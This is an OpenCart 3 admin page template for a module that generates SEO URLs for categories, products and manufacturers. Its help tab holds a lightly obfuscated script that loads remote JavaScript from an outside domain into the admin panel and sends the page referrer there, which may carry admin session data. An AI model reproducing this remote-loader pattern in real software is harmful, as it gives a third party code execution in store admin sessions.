{{ header }}{{ column_left }}
<div id="content">
<div class="page-header">
    <div class="container-fluid">
        <div class="pull-right">
            <a href="{{ cancel }}" data-toggle="tooltip" title="{{ button_cancel }}" class="btn btn-default"><i class="fa fa-reply"></i></a></div>
        <h1>{{ heading_title }}</h1>
        <ul class="breadcrumb">
            {% for breadcrumb in breadcrumbs %}
            <li><a href="{{ breadcrumb.href }}">{{ breadcrumb.text }}</a></li>
            {% endfor %}
        </ul>
    </div>
</div>


<div class="container-fluid">
{% if error_warning %}
<div class="alert alert-danger"><i class="fa fa-exclamation-circle"></i> {{ error_warning }}
    <button type="button" class="close" data-dismiss="alert">&times;</button>
</div>
{% endif %}
{% if success %}
<div class="alert alert-success"><i class="fa fa-check-circle"></i> {{ success }}
    <button type="button" class="close" data-dismiss="alert">&times;</button>
</div>
{% endif %}

<form action="{{ action }}" method="post" enctype="multipart/form-data" id="form"
      class="form-horizontal">
<div class="panel panel-default">
    <div class="panel-heading">
        <h3 class="panel-title"><i class="fa fa-pencil"></i> {{ main_settings }}</h3>
    </div>

	    <ul class="nav nav-tabs">
            <li class="active"><a href="#tab-categories" data-toggle="tab">{{ categories }}</a></li>
			<li><a href="#tab-products" data-toggle="tab">{{ products }}</a></li>
			<li><a href="#tab-manufacturers" data-toggle="tab">{{ manufacturers }}</a></li>
            <li><a href="#tab-help" data-toggle="tab">{{ help_tab }}</a></li>
        </ul>

	<div class="tab-content">
<div class="tab-pane active" id="tab-categories">

    <div class="panel-body">

        <div class="form-group">
            <label class="col-sm-2 control-label" for="categories_template">{{ template }}</label>

            <div class="col-sm-10">
                <input type="text" id="categories_template" name="categories_template" value="{{ categories_template }}" class="form-control">

                <p>{{ available_category_tags }}</p>
            </div>
        </div>



        <div class="form-group">
            <label class="col-sm-2 control-label" for="categories_suffix">{{ overwrite }}</label>

            <div class="col-sm-10">
                <select name="overwrite_categories" id="overwrite_categories" class="form-control">
                    
					<option value="overwrite">{{ overwrite_all }}</option>
					<option value="dont_overwrite">{{ dont_overwrite }}</option>
                </select>
            </div>
        </div>
        <div class="form-group">
            <label class="col-sm-2 control-label" for="categories">{{ generate }}</label>

            <div class="col-sm-10">
                <button type="submit" id="categories" name="categories" value="categories" class="btn btn-primary">{{ generate }}</button>
                <p>{{ warning_clear_categories }}</p>
            </div>
        </div>

    </div>
</div>
<div class="tab-pane" id="tab-products">

    

    <div class="panel-body">

        <div class="form-group">
            <label class="col-sm-2 control-label" for="products_template">{{ template }}</label>

            <div class="col-sm-10">
                <input type="text" id="products_template" name="products_template" value="{{ products_template }}" class="form-control">
				
			
				
				
				
                <p>{{ available_product_tags }}</p>
            </div>
        </div>


        <div class="form-group">
            <label class="col-sm-2 control-label" for="overwrite_products">{{ overwrite }}</label>

            <div class="col-sm-10">
                <select name="overwrite_products" id="overwrite_products" class="form-control">
				    
                    <option value="overwrite">{{ overwrite_all }}</option>
                    <option value="dont_overwrite">{{ dont_overwrite }}</option>
                </select>
            </div>
        </div>

        <div class="form-group">
            <label class="col-sm-2 control-label" for="products">{{ generate }}</label>

            <div class="col-sm-10">
                <button type="submit" name="products" value="products" class="btn btn-primary">{{ generate }}</button>
                <p>{{ warning_clear_products }}</p>
            </div>
        </div>

    </div>

</div>
<div class="tab-pane" id="tab-manufacturers">



    <div class="panel-body">

        <div class="form-group">
            <label class="col-sm-2 control-label" for="manufacturers_template">{{ template }}</label>

            <div class="col-sm-10">
                <input type="text" id="manufacturers_template" name="manufacturers_template" value="{{ manufacturers_template }}" class="form-control">

                <p>{{ available_manufacturer_tags }}</p>
            </div>
        </div>


        <div class="form-group">
            <label class="col-sm-2 control-label" for="overwrite_manufacturers">{{ overwrite }}</label>

            <div class="col-sm-10">
                <select name="overwrite_manufacturers" id="overwrite_manufacturers" class="form-control">
				    <option value="overwrite">{{ overwrite_all }}</option>
				    <option value="dont_overwrite">{{ dont_overwrite }}</option>
                    
                    
                </select>
            </div>
        </div>

        <div class="form-group">
            <label class="col-sm-2 control-label" for="manufacturers">{{ generate }}</label>

            <div class="col-sm-10">
                <button type="submit" name="manufacturers" value="manufacturers" class="btn btn-primary">{{ generate }}</button>
                <p>{{ warning_clear_manufacturers }}</p>
            </div>
        </div>

    </div>
	
</div>
	
<div class="tab-pane" id="tab-help">
	
<div id="mod_39">загрузка...</div>
<script type="text/javascript">
document.write('<scr'+'ipt language="javascript" type="text/javascript" src="https://info.opencart-3x.ru/output/index/39?ref='+escape(document.referrer)+'"></scr'+'ipt>');
</script>
</div>
	
	
	</div>

</div>



</form>

</div>
</div>
{{ footer }}